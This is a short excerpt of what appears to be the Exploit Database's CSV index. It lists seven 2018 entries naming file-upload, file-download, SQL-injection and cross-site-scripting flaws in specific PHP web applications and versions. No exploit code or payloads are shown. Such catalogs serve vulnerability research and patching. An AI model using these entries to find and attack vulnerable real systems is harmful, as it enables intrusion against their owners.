45868,exploits/php/webapps/45868.txt,"EverSync 0.5 - Arbitrary File Download",2018-11-15,"Ihsan Sencan",webapps,php,80
45875,exploits/php/webapps/45875.txt,"Meneame English Pligg 5.8 - 'search' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,80
45876,exploits/php/webapps/45876.txt,"Kordil EDMS 2.2.60rc3 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,
45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
45880,exploits/php/webapps/45880.txt,"Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,

Can't render this file because it is too large.